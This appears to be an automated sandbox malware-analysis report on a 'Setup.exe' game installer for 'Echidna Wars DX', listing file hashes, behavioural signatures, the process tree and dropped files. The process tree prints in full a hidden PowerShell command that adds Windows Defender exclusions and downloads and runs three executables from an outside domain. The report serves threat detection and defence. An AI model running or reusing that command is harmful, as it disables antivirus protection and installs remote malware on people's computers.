Analysis
-
max time kernel
64s -
max time network
77s -
platform
windows10-1703_x64 -
resource
win10-20240221-en -
resource tags
arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system -
submitted
22/02/2024, 20:18
Static task
static1
Behavioral task
behavioral1
Sample
Setup.exe
Resource
win10-20240221-en
General
-
Target
Setup.exe
-
Size
43.4MB
-
MD5
308090e687a5e248d6aa4a65a5db85a6
-
SHA1
ef668821cca3ed41f1212a35ce51b942f4805850
-
SHA256
0918c46a1fbac3b7cc6dc24fabf6cf053ddeffb9bc4921714fc210050e511d29
-
SHA512
7bb70fb7c8cd6a136d3870f4797a65bd67c37cf25eabd413971beda0af2e6721a0d5893ce05de67d5a5f720785ddac36c78a80dc8b38fef486963b74937edb3b
-
SSDEEP
786432:FAjeV1AyC0U9MLgeO3lPsagQYUQ4xo8vo4mMnmOZUQA2dhfTKBGG+U8ON9wB:w0kp9K7O3lPBgQHjPn1UsdBTKX+U8ONE
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 4100 Setup.tmp 4500 Game.exe -
Loads dropped DLL 6 IoCs
pid Process 4500 Game.exe 4500 Game.exe 4500 Game.exe 4500 Game.exe 4500 Game.exe 4500 Game.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 2844 4500 WerFault.exe 81 -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 4100 Setup.tmp 4100 Setup.tmp 4600 powershell.exe 4600 powershell.exe 4600 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4600 powershell.exe Token: 33 2840 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2840 AUDIODG.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4100 Setup.tmp -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4500 Game.exe 4500 Game.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 3992 wrote to memory of 4100 3992 Setup.exe 74 PID 3992 wrote to memory of 4100 3992 Setup.exe 74 PID 3992 wrote to memory of 4100 3992 Setup.exe 74 PID 4100 wrote to memory of 4568 4100 Setup.tmp 75 PID 4100 wrote to memory of 4568 4100 Setup.tmp 75 PID 4100 wrote to memory of 4568 4100 Setup.tmp 75 PID 4568 wrote to memory of 656 4568 cmd.exe 77 PID 4568 wrote to memory of 656 4568 cmd.exe 77 PID 4568 wrote to memory of 656 4568 cmd.exe 77 PID 656 wrote to memory of 4456 656 net.exe 78 PID 656 wrote to memory of 4456 656 net.exe 78 PID 656 wrote to memory of 4456 656 net.exe 78 PID 4568 wrote to memory of 4600 4568 cmd.exe 80 PID 4568 wrote to memory of 4600 4568 cmd.exe 80 PID 4568 wrote to memory of 4600 4568 cmd.exe 80
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3992 -
C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-MH2N8.tmp\Setup.tmp" /SL5="$80200,44691089,844288,C:\Users\Admin\AppData\Local\Temp\Setup.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4100 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\Echidna Wars DX\config.bat""3⤵
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Windows\SysWOW64\net.exenet session4⤵
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 session5⤵PID:4456
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle hidden Add-MpPreference -ExclusionPath C:\Users;Add-MpPreference -ExclusionPath $env:ProgramFiles;cd C:\Users\Public;Invoke-WebRequest https://jeuxviddeo.com/V1 -OutFile V1.exe;./V1.exe;Invoke-WebRequest https://jeuxviddeo.com/Q -OutFile Q.exe;./Q.exe;Invoke-WebRequest https://jeuxviddeo.com/A -OutFile A.exe;./A.exe;exit4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4600
-
-
-
-
C:\Echidna Wars DX\Game.exe"C:\Echidna Wars DX\Game.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:4500 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4500 -s 7722⤵
- Program crash
PID:2844
-
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x2f41⤵
- Suspicious use of AdjustPrivilegeToken
PID:2840
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.9MB
MD57de3741fb79dcfa8df54a4daa90c8692
SHA18003f910997a50719d55ff098f42a23d13598b08
SHA25686b7090e9f7f8f054bb17045339c523236d491c6629344ab15df824bd45df90b
SHA51231f2c524a3dfd22d0563e87ba113b5c70439735994d6a386f58d369cfc2180588db21dbfd8b30d32ed966039f3e2416cf9fae9ef5ba57a26ff978eab5a5f3e3c
-
Filesize
8.7MB
MD54e26e69b1622efa982a86cbe2edd5801
SHA18d75b18942f4ab79e29457d12d47cb7bb8763612
SHA2564251e3565483374fdea28757873a688b89c91b0558d26d099b855321a1147472
SHA5122f7118a015524142eb704f992d32e16edb34a82217a8956b041a7ef7b2927c3adcbe5797baa25f03388835c38c673315667265b6620471233ab738a586c9bfe7
-
Filesize
28.3MB
MD55769be658b2478d3d437c152adec05cf
SHA19794744bd45a038641f219ecefd31fa2e239ebbd
SHA2564df2f34e9a3df933f92cde41e6d717796267690941c2f4aac3cdfa1f607efb8e
SHA5128491e204b4c13cd2436ee02f2dd71991e3e06047a2eec02f65bca08d155202f3fc996f80cdd919607e253ba0d9d8753dd6489acf8bb66933321542d1fd5fe06e
-
Filesize
559B
MD562f9201f9ed75ebef04946bcdf72d95a
SHA15779fad609e0c77363e6436230954243c29c9205
SHA256f92075a480c98a4499c52baa308e2dfda3a78b1f52f909fbc6f5d2da77d99847
SHA512ae9690f244eee39ce39fdbc00af9e7b1a31da97e6325cd8dd465ae6288df2fe712fe8a6790d03df6bd0e244fb7e31eb0203237759f662286942a276667247806
-
Filesize
57KB
MD588735cdf603d77cceef556215e43a45f
SHA147a4d364015a3f17143978b32aeb35220c54cb0a
SHA2560ca312452a187f574090831707734f3858212a9dd143d18dbd56239e9b438212
SHA51206995af0a42d7d1e4af83e9d63589b0148caa60b9ea44b5b5fcf877bf9a5a629416ededfab30c0ee224a1caab817cdc6cc3ddb53fcf0e77effa44ef629d40d71
-
Filesize
131KB
MD5def47290ed52d7ce0a2e65e8ffac95a2
SHA10edc4bb840d995a5d80f1cd15026e655c817a6ce
SHA256558fd9b141f343a81cc76e653ecdb051b4621ce022d1e8af49142831e56371fc
SHA512469492d4762acc92674ad3f173b05cb974bca1dfcc046e9117de644cd4326cdf7edd1e6bd6dfd1fd2400a1bcaff178f56c068c2fa2f9866431bdfc22e3eaf208
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
3.0MB
MD59665ccc8017eab35c9bea56ab727692a
SHA1177a4d25e994e3a5e792360ce1ef48a25c9600e3
SHA256dc06f837689227d615d587bd7405ab6ec327579cd0f8995f9072d559b4e45c4c
SHA512df5fe843347445d75ee89690c336090b2a179a2d752111a6023a6e95abcdc19651774977e4f673ee54ba21295d2aaf3ab7b3e7b0b0449f1f0b6601cdd76a5ce5
-
Filesize
608KB
MD5401a237f4e02457713382b2413a4800c
SHA1fcddfc03d93011efb0e0910c456aa47f2e632057
SHA2565eed0341f3399b833d56402bf4b9c67bae6469e099ee0b802e9ebee428550565
SHA512443932fb5cde7ac0b69b4e738740ac11b1b9ea0b6f33d0d3111644291b1f9b92e9c4f501dc98abacc565a67e8e9019c030e8a579d86dc462fe07120da223eb61
-
Filesize
236KB
MD58c44de023765b683fce13c7d17a00add
SHA1b5256452df6f534057271a8cd1df817ce3a5bbe7
SHA25602859dd4efc1920a848a55215de439dc00c5c09c5b609c5ca1421914a3d43cd8
SHA512ae316ed8b11968351510a3c8e4cf524a4f6b645e38a8947e9199b7ce059ea4570f01b976e1a520a18373d19e9fdeda096aab53f71268b8f20f54f406001076d2